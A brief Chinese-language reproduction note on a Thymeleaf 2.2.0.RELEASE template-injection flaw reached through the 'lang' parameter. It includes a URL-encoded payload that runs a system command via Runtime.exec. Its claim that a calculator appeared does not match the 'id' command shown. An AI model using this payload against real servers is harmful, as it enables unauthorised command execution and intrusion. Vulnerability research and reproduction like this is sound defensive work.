目录
漏洞特征
存在于这样的界面中,参数lang输入zh_CN显示的是中文
输入en显示的是英文
页面本来是想换一种显示的语言,但是模板引擎存在漏洞就打进内网了
复现
写了两个页面:Index-en.html和index.html,使用的是模版引擎:Thymeleaf2.2.0.release渲染的,这个版本存在漏洞
lang参数注入:
?lang=__$%7bnew%20java.util.Scanner(T(java.lang.Runtime).getRuntime().exec(%22id%22).getInputStream()).next()%7d__::.x
弹出计算器,复现成功